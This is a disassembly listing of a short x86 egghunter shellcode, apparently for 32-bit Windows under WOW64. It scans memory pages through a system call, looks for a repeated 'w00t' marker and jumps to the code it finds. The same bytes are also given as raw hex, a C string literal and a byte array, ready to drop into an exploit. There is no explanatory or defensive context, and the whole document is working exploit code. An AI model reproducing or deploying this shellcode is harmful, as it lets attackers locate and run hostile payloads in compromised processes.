0x0        or dx, 0xfff                        \x66\x81\xca\xff\x0f      f....     
     label_0x5:
0x5        xor ebx, ebx                        \x33\xdb                  3.        
0x7        inc edx                             \x42                      B         
0x8        push edx                            \x52                      R         
0x9        push ebx                            \x53                      S         
0xa        push ebx                            \x53                      S         
0xb        push ebx                            \x53                      S         
0xc        push ebx                            \x53                      S         
0xd        push 0x29                           \x6a\x29                  j)        
0xf        pop eax                             \x58                      X         
0x10       mov bl, 0xc0                        \xb3\xc0                  ..        
0x12       call dword ptr fs:[ebx]             \x64\xff\x13              d..       
0x15       add esp, 0x10                       \x83\xc4\x10              ...       
0x18       pop edx                             \x5a                      Z         
0x19       cmp al, 5                           \x3c\x05                  <.        
0x1b       je 0                                \x74\xe3                  t.        

0x1d       mov eax, 0x74303077                 \xb8\x77\x30\x30\x74      .w00t     
0x22       mov edi, edx                        \x8b\xfa                  ..        
0x24       scasd eax, dword ptr es:[edi]       \xaf                      .         
0x25       jne 5                               \x75\xde                  u.        

0x27       scasd eax, dword ptr es:[edi]       \xaf                      .         
0x28       jne 5                               \x75\xdb                  u.        

0x2a       jmp edi                             \xff\xe7                  ..        


Raw Hex:
"6681caff0f33db4252535353536a2958b3c064ff1383c4105a3c0574e3b8773030748bfaaf75deaf75dbffe7"

String Literal:
"\x66\x81\xca\xff\x0f\x33\xdb\x42\x52\x53\x53\x53\x53\x6a\x29\x58\xb3\xc0\x64\xff\x13\x83\xc4\x10\x5a\x3c\x05\x74\xe3\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xde\xaf\x75\xdb\xff\xe7"

Array Literal:
{ 0x66, 0x81, 0xca, 0xff, 0x0f, 0x33, 0xdb, 0x42, 0x52, 0x53, 0x53, 0x53, 0x53, 0x6a, 0x29, 0x58, 0xb3, 0xc0, 0x64, 0xff, 0x13, 0x83, 0xc4, 0x10, 0x5a, 0x3c, 0x05, 0x74, 0xe3, 0xb8, 0x77, 0x30, 0x30, 0x74, 0x8b, 0xfa, 0xaf, 0x75, 0xde, 0xaf, 0x75, 0xdb, 0xff, 0xe7 }
